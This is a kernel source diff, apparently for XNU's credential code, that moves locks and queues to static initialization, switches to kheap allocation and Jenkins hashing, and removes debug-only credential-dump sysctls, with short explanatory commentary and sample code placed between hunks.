index c3eb07764fc8311e2f52006b8e71f88d73eb986b..a864456f6d31040721f83972acd6dd543270fdf4 100644 (file)
@@ -74,6 +74,7 @@
 #include <security/_label.h>
 #endif
 
+#include <os/hash.h>
 #include <IOKit/IOBSD.h>
 
 void mach_kauth_cred_uthread_update( void );
@@ -106,43 +107,12 @@ void mach_kauth_cred_uthread_update( void );
  *
  * Note:       Does *NOT* currently include per-thread credential changes
  */
-
 #if DEBUG_CRED
 #define DEBUG_CRED_ENTER                printf
 #define DEBUG_CRED_CHANGE               printf
-extern void kauth_cred_print(kauth_cred_t cred);
-
-#include <libkern/OSDebug.h>    /* needed for get_backtrace( ) */
-
-int is_target_cred( kauth_cred_t the_cred );
-void get_backtrace( void );
-
-static int sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1,
-    __unused int arg2, struct sysctl_req *req );
-static int
-sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1,
-    __unused int arg2, struct sysctl_req *req );
-
-#define MAX_STACK_DEPTH 8
-struct cred_backtrace {
-       int                             depth;
-       void *                  stack[MAX_STACK_DEPTH];
-};
-typedef struct cred_backtrace cred_backtrace;
-
-#define MAX_CRED_BUFFER_SLOTS 200
-struct cred_debug_buffer {
-       int                             next_slot;
-       cred_backtrace  stack_buffer[MAX_CRED_BUFFER_SLOTS];
-};
-typedef struct cred_debug_buffer cred_debug_buffer;
-cred_debug_buffer * cred_debug_buf_p = NULL;
-
 #else   /* !DEBUG_CRED */
-
 #define DEBUG_CRED_ENTER(fmt, ...)      do {} while (0)
 #define DEBUG_CRED_CHANGE(fmt, ...)     do {} while (0)
-
 #endif  /* !DEBUG_CRED */
 
 #if CONFIG_EXT_RESOLVER
@@ -155,14 +125,14 @@ cred_debug_buffer * cred_debug_buf_p = NULL;
  * times out.
  */
 
-static lck_mtx_t *kauth_resolver_mtx;
-#define KAUTH_RESOLVER_LOCK()   lck_mtx_lock(kauth_resolver_mtx);
-#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(kauth_resolver_mtx);
+static LCK_MTX_DECLARE(kauth_resolver_mtx, &kauth_lck_grp);
+#define KAUTH_RESOLVER_LOCK()   lck_mtx_lock(&kauth_resolver_mtx);
+#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(&kauth_resolver_mtx);
 
 static volatile pid_t   kauth_resolver_identity;
 static int      kauth_identitysvc_has_registered;
 static int      kauth_resolver_registered;
-static uint32_t kauth_resolver_sequence;
+static uint32_t kauth_resolver_sequence = 31337;
 static int      kauth_resolver_timeout = 30;    /* default: 30 seconds */
 
 struct kauth_resolver_work {
@@ -178,9 +148,12 @@ struct kauth_resolver_work {
        int             kr_result;
 };
 
-TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted;
-TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work)  kauth_resolver_submitted;
-TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work)       kauth_resolver_done;
+TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted =
+    TAILQ_HEAD_INITIALIZER(kauth_resolver_unsubmitted);
+TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work) kauth_resolver_submitted =
+    TAILQ_HEAD_INITIALIZER(kauth_resolver_submitted);
+TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work) kauth_resolver_done =
+    TAILQ_HEAD_INITIALIZER(kauth_resolver_done);
 
 /* Number of resolver timeouts between logged complaints */
 #define KAUTH_COMPLAINT_INTERVAL 1000
@@ -233,10 +206,11 @@ struct kauth_identity {
        time_t  ki_ntsid_expiry;
 };
 
-static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities;
-static lck_mtx_t *kauth_identity_mtx;
-#define KAUTH_IDENTITY_LOCK()   lck_mtx_lock(kauth_identity_mtx);
-#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(kauth_identity_mtx);
+static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities =
+    TAILQ_HEAD_INITIALIZER(kauth_identities);
+static LCK_MTX_DECLARE(kauth_identity_mtx, &kauth_lck_grp);
+#define KAUTH_IDENTITY_LOCK()   lck_mtx_lock(&kauth_identity_mtx);
+#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(&kauth_identity_mtx);
 #define KAUTH_IDENTITY_CACHEMAX_DEFAULT 100     /* XXX default sizing? */
 static int kauth_identity_cachemax = KAUTH_IDENTITY_CACHEMAX_DEFAULT;
 static int kauth_identity_count;
@@ -265,10 +239,11 @@ struct kauth_group_membership {
 #define KAUTH_GROUP_ISMEMBER    (1<<0)
 };
 
-TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups;
-static lck_mtx_t *kauth_groups_mtx;
-#define KAUTH_GROUPS_LOCK()     lck_mtx_lock(kauth_groups_mtx);
-#define KAUTH_GROUPS_UNLOCK()   lck_mtx_unlock(kauth_groups_mtx);
+TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups =
+    TAILQ_HEAD_INITIALIZER(kauth_groups);
+static LCK_MTX_DECLARE(kauth_groups_mtx, &kauth_lck_grp);
+#define KAUTH_GROUPS_LOCK()     lck_mtx_lock(&kauth_groups_mtx);
+#define KAUTH_GROUPS_UNLOCK()   lck_mtx_unlock(&kauth_groups_mtx);
 #define KAUTH_GROUPS_CACHEMAX_DEFAULT 100       /* XXX default sizing? */
 static int kauth_groups_cachemax = KAUTH_GROUPS_CACHEMAX_DEFAULT;
 static int kauth_groups_count;
@@ -283,6 +258,7 @@ static void     kauth_groups_trimcache(int newsize);
 #define KAUTH_CRED_TABLE_SIZE 128
 
 ZONE_DECLARE(ucred_zone, "cred", sizeof(struct ucred), ZC_ZFREE_CLEARMEM);
+
 LIST_HEAD(kauth_cred_entry_head, ucred);
 static struct kauth_cred_entry_head
     kauth_cred_table_anchor[KAUTH_CRED_TABLE_SIZE];
@@ -323,7 +299,7 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__(
                /* we could compute a better timeout here */
                ts.tv_sec = kauth_resolver_timeout;
                ts.tv_nsec = 0;
-               error = msleep(workp, kauth_resolver_mtx, PCATCH, "kr_submit", &ts);
+               error = msleep(workp, &kauth_resolver_mtx, PCATCH, "kr_submit", &ts);
                /* request has been completed? */
                if ((error == 0) && (workp->kr_flags & KAUTH_REQUEST_DONE)) {
                        break;
@@ -343,43 +319,6 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__(
 }
 
 
-/*
- * kauth_resolver_init
- *
- * Description:        Initialize the daemon side of the credential identity resolver
- *
- * Parameters: (void)
- *
- * Returns:    (void)
- *
- * Notes:      Initialize the credential identity resolver for use; the
- *             credential identity resolver is the KPI used by the user
- *             space credential identity resolver daemon to communicate
- *             with the kernel via the identitysvc() system call..
- *
- *             This is how membership in more than 16 groups (1 effective
- *             and 15 supplementary) is supported, and also how UID's,
- *             UUID's, and so on, are translated to/from POSIX credential
- *             values.
- *
- *             The credential identity resolver operates by attempting to
- *             determine identity first from the credential, then from
- *             the kernel credential identity cache, and finally by
- *             enqueueing a request to a user space daemon.
- *
- *             This function is called from kauth_init() in the file
- *             kern_authorization.c.
- */
-void
-kauth_resolver_init(void)
-{
-       TAILQ_INIT(&kauth_resolver_unsubmitted);
-       TAILQ_INIT(&kauth_resolver_submitted);
-       TAILQ_INIT(&kauth_resolver_done);
-       kauth_resolver_sequence = 31337;
-       kauth_resolver_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-}
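
kauth_resolver_init() can be deleted because everything it did at boot is now expressed as a static initializer: the mutex comes from LCK_MTX_DECLARE, the three work queues from TAILQ_HEAD_INITIALIZER, and the 31337 sequence seed moves onto the variable definition. A sketch of that initialization-at-definition pattern with hypothetical sample_* names, not the kauth symbols:

    #include <kern/locks.h>
    #include <sys/queue.h>

    static LCK_GRP_DECLARE(sample_lck_grp, "sample");
    static LCK_MTX_DECLARE(sample_mtx, &sample_lck_grp);

    struct sample_work {
        TAILQ_ENTRY(sample_work) link;
        int                      value;
    };

    static TAILQ_HEAD(sample_head, sample_work) sample_queue =
        TAILQ_HEAD_INITIALIZER(sample_queue);

    /* seed that used to be assigned inside the init routine */
    static uint32_t sample_sequence = 31337;

    /*
     * No sample_init() is required: the mutex, the queue head and the
     * sequence seed are all valid before first use.
     */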
-
 /*
  * kauth_resolver_identity_reset
  *
@@ -469,7 +408,8 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data
                }
        }
 
-       MALLOC(workp, struct kauth_resolver_work *, sizeof(*workp), M_KAUTH, M_WAITOK);
+       workp = kheap_alloc(KM_KAUTH, sizeof(struct kauth_resolver_work),
+           Z_WAITOK);
        if (workp == NULL) {
                return ENOMEM;
        }
@@ -575,7 +515,7 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data
         * If we dropped the last reference, free the request.
         */
        if (shouldfree) {
-               FREE(workp, M_KAUTH);
+               kheap_free(KM_KAUTH, workp, sizeof(struct kauth_resolver_work));
        }
 
        KAUTH_DEBUG("RESOLVER - returning %d", error);
@@ -795,7 +735,7 @@ kauth_resolver_getwork_continue(int result)
        if (TAILQ_FIRST(&kauth_resolver_unsubmitted) == NULL) {
                int error;
 
-               error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
+               error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
                /*
                 * If this is a wakeup from another thread in the resolver
                 * deregistering it, error out the request-for-work thread
@@ -938,7 +878,7 @@ kauth_resolver_getwork(user_addr_t message)
                struct uthread *ut = get_bsdthread_info(thread);
 
                ut->uu_save.uus_kauth.message = message;
-               error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
+               error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue);
                KAUTH_RESOLVER_UNLOCK();
                /*
                 * If this is a wakeup from another thread in the resolver
@@ -1149,30 +1089,6 @@ kauth_resolver_complete(user_addr_t message)
 #define KI_VALID_GROUPS (1<<6)
 
 #if CONFIG_EXT_RESOLVER
-/*
- * kauth_identity_init
- *
- * Description:        Initialize the kernel side of the credential identity resolver
- *
- * Parameters: (void)
- *
- * Returns:    (void)
- *
- * Notes:      Initialize the credential identity resolver for use; the
- *             credential identity resolver is the KPI used to communicate
- *             with a user space credential identity resolver daemon.
- *
- *             This function is called from kauth_init() in the file
- *             kern_authorization.c.
- */
-void
-kauth_identity_init(void)
-{
-       TAILQ_INIT(&kauth_identities);
-       kauth_identity_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-}
-
-
 /*
  * kauth_identity_alloc
  *
@@ -1198,7 +1114,8 @@ kauth_identity_alloc(uid_t uid, gid_t gid, guid_t *guidp, time_t guid_expiry,
        struct kauth_identity *kip;
 
        /* get and fill in a new identity */
-       MALLOC(kip, struct kauth_identity *, sizeof(*kip), M_KAUTH, M_WAITOK | M_ZERO);
+       kip = kheap_alloc(KM_KAUTH, sizeof(struct kauth_identity),
+           Z_WAITOK | Z_ZERO);
        if (kip != NULL) {
                if (gid != KAUTH_GID_NONE) {
                        kip->ki_gid = gid;
@@ -1334,7 +1251,7 @@ kauth_identity_register_and_free(struct kauth_identity *kip)
                        vfs_removename(ip->ki_name);
                }
                /* free the expired entry */
-               FREE(ip, M_KAUTH);
+               kheap_free(KM_KAUTH, ip, sizeof(struct kauth_identity));
        }
 }
 
@@ -1544,13 +1461,13 @@ kauth_identity_trimcache(int newsize)
 {
        struct kauth_identity           *kip;
 
-       lck_mtx_assert(kauth_identity_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&kauth_identity_mtx, LCK_MTX_ASSERT_OWNED);
 
        while (kauth_identity_count > newsize) {
                kip = TAILQ_LAST(&kauth_identities, kauth_identity_head);
                TAILQ_REMOVE(&kauth_identities, kip, ki_link);
                kauth_identity_count--;
-               FREE(kip, M_KAUTH);
+               kheap_free(KM_KAUTH, kip, sizeof(struct kauth_identity));
        }
 }
 
@@ -2987,29 +2904,6 @@ found:
  * XXX the linked-list implementation here needs to be optimized.
  */
 
-/*
- * kauth_groups_init
- *
- * Description:        Initialize the groups cache
- *
- * Parameters: (void)
- *
- * Returns:    (void)
- *
- * Notes:      Initialize the groups cache for use; the group cache is used
- *             to avoid unnecessary calls out to user space.
- *
- *             This function is called from kauth_init() in the file
- *             kern_authorization.c.
- */
-void
-kauth_groups_init(void)
-{
-       TAILQ_INIT(&kauth_groups);
-       kauth_groups_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-}
-
-
 /*
  * kauth_groups_expired
  *
@@ -3120,7 +3014,8 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el)
        }
 
        /* allocate a new record */
-       MALLOC(gm, struct kauth_group_membership *, sizeof(*gm), M_KAUTH, M_WAITOK);
+       gm = kheap_alloc(KM_KAUTH, sizeof(struct kauth_group_membership),
+           Z_WAITOK);
        if (gm != NULL) {
                gm->gm_uid = el->el_uid;
                gm->gm_gid = el->el_gid;
@@ -3150,9 +3045,7 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el)
        KAUTH_GROUPS_UNLOCK();
 
        /* free expired cache entry */
-       if (gm != NULL) {
-               FREE(gm, M_KAUTH);
-       }
+       kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership));
 }
 
 /*
@@ -3165,13 +3058,13 @@ kauth_groups_trimcache(int new_size)
 {
        struct kauth_group_membership *gm;
 
-       lck_mtx_assert(kauth_groups_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&kauth_groups_mtx, LCK_MTX_ASSERT_OWNED);
 
        while (kauth_groups_count > new_size) {
                gm = TAILQ_LAST(&kauth_groups, kauth_groups_head);
                TAILQ_REMOVE(&kauth_groups, gm, gm_link);
                kauth_groups_count--;
-               FREE(gm, M_KAUTH);
+               kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership));
        }
 }
 #endif  /* CONFIG_EXT_RESOLVER */
@@ -3508,7 +3401,7 @@ kauth_cred_issuser(kauth_cred_t cred)
  */
 
 /* lock protecting credential hash table */
-static lck_mtx_t kauth_cred_hash_mtx;
+static LCK_MTX_DECLARE(kauth_cred_hash_mtx, &kauth_lck_grp);
 #define KAUTH_CRED_HASH_LOCK()          lck_mtx_lock(&kauth_cred_hash_mtx);
 #define KAUTH_CRED_HASH_UNLOCK()        lck_mtx_unlock(&kauth_cred_hash_mtx);
 #define KAUTH_CRED_HASH_LOCK_ASSERT()   LCK_MTX_ASSERT(&kauth_cred_hash_mtx, LCK_MTX_ASSERT_OWNED)
@@ -3548,8 +3441,6 @@ static lck_mtx_t kauth_cred_hash_mtx;
 void
 kauth_cred_init(void)
 {
-       lck_mtx_init(&kauth_cred_hash_mtx, kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
-
        for (int i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) {
                LIST_INIT(&kauth_cred_table_anchor[i]);
        }
@@ -4812,12 +4703,6 @@ kauth_cred_tryref(kauth_cred_t cred)
                kauth_cred_panic_over_retain(cred);
        }
 
-#if 0 // use this to watch a specific credential
-       if (is_target_cred( *credp ) != 0) {
-               get_backtrace();
-       }
-#endif
-
        return true;
 }
 
@@ -4841,12 +4726,6 @@ kauth_cred_ref(kauth_cred_t cred)
        if (__improbable(old_ref >= KAUTH_CRED_REF_MAX)) {
                kauth_cred_panic_over_retain(cred);
        }
-
-#if 0 // use this to watch a specific credential
-       if (is_target_cred( cred ) != 0) {
-               get_backtrace();
-       }
-#endif
 }
 
 /*
@@ -4866,12 +4745,6 @@ kauth_cred_unref_fast(kauth_cred_t cred)
 {
        u_long old_ref = os_atomic_dec_orig(&cred->cr_ref, relaxed);
 
-#if 0 // use this to watch a specific credential
-       if (is_target_cred( *credp ) != 0) {
-               get_backtrace();
-       }
-#endif
-
        if (__improbable(old_ref <= 0)) {
                kauth_cred_panic_over_released(cred);
        }
@@ -5246,7 +5119,7 @@ kauth_cred_is_equal(kauth_cred_t cred1, kauth_cred_t cred2)
 #if CONFIG_MACF
        /* Note: we know the flags are equal, so we only need to test one */
        if (pcred1->cr_flags & CRF_MAC_ENFORCE) {
-               if (!mac_cred_label_compare(cred1->cr_label, cred2->cr_label)) {
+               if (!mac_cred_label_is_equal(cred1->cr_label, cred2->cr_label)) {
                        return false;
                }
        }
@@ -5328,37 +5201,6 @@ kauth_cred_find(kauth_cred_t cred)
 }
 
 
-/*
- * kauth_cred_hash
- *
- * Description:        Generates a hash key using data that makes up a credential;
- *             based on ElfHash
- *
- * Parameters: datap                           Pointer to data to hash
- *             data_len                        Count of bytes to hash
- *             start_key                       Start key value
- *
- * Returns:    (u_long)                        Returned hash key
- */
-static inline u_long
-kauth_cred_hash(const uint8_t *datap, int data_len, u_long start_key)
-{
-       u_long  hash_key = start_key;
-       u_long  temp;
-
-       while (data_len > 0) {
-               hash_key = (hash_key << 4) + *datap++;
-               temp = hash_key & 0xF0000000;
-               if (temp) {
-                       hash_key ^= temp >> 24;
-               }
-               hash_key &= ~temp;
-               data_len--;
-       }
-       return hash_key;
-}
-
-
 /*
  * kauth_cred_get_bucket
  *
@@ -5383,356 +5225,25 @@ kauth_cred_get_bucket(kauth_cred_t cred)
 #if CONFIG_MACF
        posix_cred_t pcred = posix_cred_get(cred);
 #endif
-       u_long  hash_key = 0;
-
-       hash_key = kauth_cred_hash((uint8_t *)&cred->cr_posix,
-           sizeof(struct posix_cred),
-           hash_key);
-       hash_key = kauth_cred_hash((uint8_t *)&cred->cr_audit,
-           sizeof(struct au_session),
-           hash_key);
+       uint32_t hash_key = 0;
+
+       hash_key = os_hash_jenkins_update(&cred->cr_posix,
+           sizeof(struct posix_cred), hash_key);
+
+       hash_key = os_hash_jenkins_update(&cred->cr_audit,
+           sizeof(struct au_session), hash_key);
 #if CONFIG_MACF
        if (pcred->cr_flags & CRF_MAC_ENFORCE) {
-               hash_key = kauth_cred_hash((uint8_t *)cred->cr_label,
-                   sizeof(struct label),
-                   hash_key);
+               hash_key = mac_cred_label_hash_update(cred->cr_label, hash_key);
        }
-#endif
+#endif /* CONFIG_MACF */
 
+       hash_key = os_hash_jenkins_finish(hash_key);
        hash_key %= KAUTH_CRED_TABLE_SIZE;
        return &kauth_cred_table_anchor[hash_key];
 }
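
kauth_cred_get_bucket() now chains os_hash_jenkins_update() over each region of the credential and reduces the finished value modulo the table size, replacing the removed ElfHash-style kauth_cred_hash(). A sketch of that incremental-hash pattern from <os/hash.h>, with a hypothetical key structure and table size:

    #include <stdint.h>
    #include <os/hash.h>

    #define SAMPLE_TABLE_SIZE 128

    struct sample_key {
        uint32_t    a;
        uint64_t    b;
    };

    static uint32_t
    sample_bucket(const struct sample_key *key, const void *label, size_t label_len)
    {
        uint32_t hash = 0;

        /* chain the running value through each region ... */
        hash = os_hash_jenkins_update(key, sizeof(*key), hash);
        if (label != NULL) {
            hash = os_hash_jenkins_update(label, label_len, hash);
        }
        /* ... finalize once, then reduce to a bucket index */
        hash = os_hash_jenkins_finish(hash);
        return hash % SAMPLE_TABLE_SIZE;
    }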
 
 
-#ifdef DEBUG_CRED
-/*
- * kauth_cred_print
- *
- * Description:        Print out an individual credential's contents for debugging
- *             purposes
- *
- * Parameters: cred                            The credential to print out
- *
- * Returns:    (void)
- *
- * Implicit returns:   Results in console output
- */
-void
-kauth_cred_print(kauth_cred_t cred)
-{
-       int     i;
-
-       printf("%p - refs %lu flags 0x%08x uids e%d r%d sv%d gm%d ", cred, cred->cr_ref, cred->cr_flags, cred->cr_uid, cred->cr_ruid, cred->cr_svuid, cred->cr_gmuid);
-       printf("group count %d gids ", cred->cr_ngroups);
-       for (i = 0; i < NGROUPS; i++) {
-               if (i == 0) {
-                       printf("e");
-               }
-               printf("%d ", cred->cr_groups[i]);
-       }
-       printf("r%d sv%d ", cred->cr_rgid, cred->cr_svgid);
-       printf("auditinfo_addr %d %d %d %d %d %d\n",
-           cred->cr_audit.s_aia_p->ai_auid,
-           cred->cr_audit.as_mask.am_success,
-           cred->cr_audit.as_mask.am_failure,
-           cred->cr_audit.as_aia_p->ai_termid.at_port,
-           cred->cr_audit.as_aia_p->ai_termid.at_addr[0],
-           cred->cr_audit.as_aia_p->ai_asid);
-}
-
-int
-is_target_cred( kauth_cred_t the_cred )
-{
-       if (the_cred->cr_uid != 0) {
-               return 0;
-       }
-       if (the_cred->cr_ruid != 0) {
-               return 0;
-       }
-       if (the_cred->cr_svuid != 0) {
-               return 0;
-       }
-       if (the_cred->cr_ngroups != 11) {
-               return 0;
-       }
-       if (the_cred->cr_groups[0] != 11) {
-               return 0;
-       }
-       if (the_cred->cr_groups[1] != 81) {
-               return 0;
-       }
-       if (the_cred->cr_groups[2] != 63947) {
-               return 0;
-       }
-       if (the_cred->cr_groups[3] != 80288) {
-               return 0;
-       }
-       if (the_cred->cr_groups[4] != 89006) {
-               return 0;
-       }
-       if (the_cred->cr_groups[5] != 52173) {
-               return 0;
-       }
-       if (the_cred->cr_groups[6] != 84524) {
-               return 0;
-       }
-       if (the_cred->cr_groups[7] != 79) {
-               return 0;
-       }
-       if (the_cred->cr_groups[8] != 80292) {
-               return 0;
-       }
-       if (the_cred->cr_groups[9] != 80) {
-               return 0;
-       }
-       if (the_cred->cr_groups[10] != 90824) {
-               return 0;
-       }
-       if (the_cred->cr_rgid != 11) {
-               return 0;
-       }
-       if (the_cred->cr_svgid != 11) {
-               return 0;
-       }
-       if (the_cred->cr_gmuid != 3475) {
-               return 0;
-       }
-       if (the_cred->cr_audit.as_aia_p->ai_auid != 3475) {
-               return 0;
-       }
-/*
- *       if ( the_cred->cr_audit.as_mask.am_success != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_mask.am_failure != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_aia_p->ai_termid.at_port != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_aia_p->ai_termid.at_addr[0] != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_audit.as_aia_p->ai_asid != 0 )
- *               return( 0 );
- *       if ( the_cred->cr_flags != 0 )
- *               return( 0 );
- */
-       return -1;  // found target cred
-}
-
-void
-get_backtrace( void )
-{
-       int                             my_slot;
-       void *                  my_stack[MAX_STACK_DEPTH];
-       int                             i, my_depth;
-
-       if (cred_debug_buf_p == NULL) {
-               MALLOC(cred_debug_buf_p, cred_debug_buffer *, sizeof(*cred_debug_buf_p), M_KAUTH, M_WAITOK);
-               bzero(cred_debug_buf_p, sizeof(*cred_debug_buf_p));
-       }
-
-       if (cred_debug_buf_p->next_slot > (MAX_CRED_BUFFER_SLOTS - 1)) {
-               /* buffer is full */
-               return;
-       }
-
-       my_depth = OSBacktrace(&my_stack[0], MAX_STACK_DEPTH);
-       if (my_depth == 0) {
-               printf("%s - OSBacktrace failed \n", __FUNCTION__);
-               return;
-       }
-
-       /* fill new backtrace */
-       my_slot = cred_debug_buf_p->next_slot;
-       cred_debug_buf_p->next_slot++;
-       cred_debug_buf_p->stack_buffer[my_slot].depth = my_depth;
-       for (i = 0; i < my_depth; i++) {
-               cred_debug_buf_p->stack_buffer[my_slot].stack[i] = my_stack[i];
-       }
-
-       return;
-}
-
-
-/* subset of struct ucred for use in sysctl_dump_creds */
-struct debug_ucred {
-       void    *credp;
-       u_long  cr_ref;                         /* reference count */
-       uid_t   cr_uid;                         /* effective user id */
-       uid_t   cr_ruid;                        /* real user id */
-       uid_t   cr_svuid;                       /* saved user id */
-       u_short cr_ngroups;                     /* number of groups in advisory list */
-       gid_t   cr_groups[NGROUPS];     /* advisory group list */
-       gid_t   cr_rgid;                        /* real group id */
-       gid_t   cr_svgid;                       /* saved group id */
-       uid_t   cr_gmuid;                       /* UID for group membership purposes */
-       struct auditinfo_addr cr_audit; /* user auditing data. */
-       void    *cr_label;                      /* MACF label */
-       int             cr_flags;                       /* flags on credential */
-};
-typedef struct debug_ucred debug_ucred;
-
-SYSCTL_PROC(_kern, OID_AUTO, dump_creds, CTLFLAG_RD,
-    NULL, 0, sysctl_dump_creds, "S,debug_ucred", "List of credentials in the cred hash");
-
-/*     accessed by:
- *     err = sysctlbyname( "kern.dump_creds", bufp, &len, NULL, 0 );
- */
-
-static int
-sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req )
-{
-       int                     i, j, counter = 0;
-       int                             error;
-       size_t                  space;
-       kauth_cred_t    found_cred;
-       debug_ucred *   cred_listp;
-       debug_ucred *   nextp;
-
-       /* This is a readonly node. */
-       if (req->newptr != USER_ADDR_NULL) {
-               return EPERM;
-       }
-
-       /* calculate space needed */
-       for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) {
-               TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) {
-                       counter++;
-               }
-       }
-
-       /* they are querying us so just return the space required. */
-       if (req->oldptr == USER_ADDR_NULL) {
-               counter += 10; // add in some padding;
-               req->oldidx = counter * sizeof(debug_ucred);
-               return 0;
-       }
-
-       MALLOC( cred_listp, debug_ucred *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO);
-       if (cred_listp == NULL) {
-               return ENOMEM;
-       }
-
-       /* fill in creds to send back */
-       nextp = cred_listp;
-       space = 0;
-       for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) {
-               TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) {
-                       nextp->credp = found_cred;
-                       nextp->cr_ref = found_cred->cr_ref;
-                       nextp->cr_uid = found_cred->cr_uid;
-                       nextp->cr_ruid = found_cred->cr_ruid;
-                       nextp->cr_svuid = found_cred->cr_svuid;
-                       nextp->cr_ngroups = found_cred->cr_ngroups;
-                       for (j = 0; j < nextp->cr_ngroups; j++) {
-                               nextp->cr_groups[j] = found_cred->cr_groups[j];
-                       }
-                       nextp->cr_rgid = found_cred->cr_rgid;
-                       nextp->cr_svgid = found_cred->cr_svgid;
-                       nextp->cr_gmuid = found_cred->cr_gmuid;
-                       nextp->cr_audit.ai_auid =
-                           found_cred->cr_audit.as_aia_p->ai_auid;
-                       nextp->cr_audit.ai_mask.am_success =
-                           found_cred->cr_audit.as_mask.am_success;
-                       nextp->cr_audit.ai_mask.am_failure =
-                           found_cred->cr_audit.as_mask.am_failure;
-                       nextp->cr_audit.ai_termid.at_port =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_port;
-                       nextp->cr_audit.ai_termid.at_type =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_type;
-                       nextp->cr_audit.ai_termid.at_addr[0] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[0];
-                       nextp->cr_audit.ai_termid.at_addr[1] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[1];
-                       nextp->cr_audit.ai_termid.at_addr[2] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[2];
-                       nextp->cr_audit.ai_termid.at_addr[3] =
-                           found_cred->cr_audit.as_aia_p->ai_termid.at_addr[3];
-                       nextp->cr_audit.ai_asid =
-                           found_cred->cr_audit.as_aia_p->ai_asid;
-                       nextp->cr_audit.ai_flags =
-                           found_cred->cr_audit.as_aia_p->ai_flags;
-                       nextp->cr_label = found_cred->cr_label;
-                       nextp->cr_flags = found_cred->cr_flags;
-                       nextp++;
-                       space += sizeof(debug_ucred);
-                       if (space > req->oldlen) {
-                               FREE(cred_listp, M_TEMP);
-                               return ENOMEM;
-                       }
-               }
-       }
-       req->oldlen = space;
-       error = SYSCTL_OUT(req, cred_listp, req->oldlen);
-       FREE(cred_listp, M_TEMP);
-       return error;
-}
-
-
-SYSCTL_PROC(_kern, OID_AUTO, cred_bt, CTLFLAG_RD,
-    NULL, 0, sysctl_dump_cred_backtraces, "S,cred_debug_buffer", "dump credential backtrace");
-
-/*     accessed by:
- *     err = sysctlbyname( "kern.cred_bt", bufp, &len, NULL, 0 );
- */
-
-static int
-sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req )
-{
-       int                     i, j;
-       int                             error;
-       size_t                  space;
-       cred_debug_buffer *     bt_bufp;
-       cred_backtrace *        nextp;
-
-       /* This is a readonly node. */
-       if (req->newptr != USER_ADDR_NULL) {
-               return EPERM;
-       }
-
-       if (cred_debug_buf_p == NULL) {
-               return EAGAIN;
-       }
-
-       /* calculate space needed */
-       space = sizeof(cred_debug_buf_p->next_slot);
-       space += (sizeof(cred_backtrace) * cred_debug_buf_p->next_slot);
-
-       /* they are querying us so just return the space required. */
-       if (req->oldptr == USER_ADDR_NULL) {
-               req->oldidx = space;
-               return 0;
-       }
-
-       if (space > req->oldlen) {
-               return ENOMEM;
-       }
-
-       MALLOC( bt_bufp, cred_debug_buffer *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO);
-       if (bt_bufp == NULL) {
-               return ENOMEM;
-       }
-
-       /* fill in backtrace info to send back */
-       bt_bufp->next_slot = cred_debug_buf_p->next_slot;
-       space = sizeof(bt_bufp->next_slot);
-
-       nextp = &bt_bufp->stack_buffer[0];
-       for (i = 0; i < cred_debug_buf_p->next_slot; i++) {
-               nextp->depth = cred_debug_buf_p->stack_buffer[i].depth;
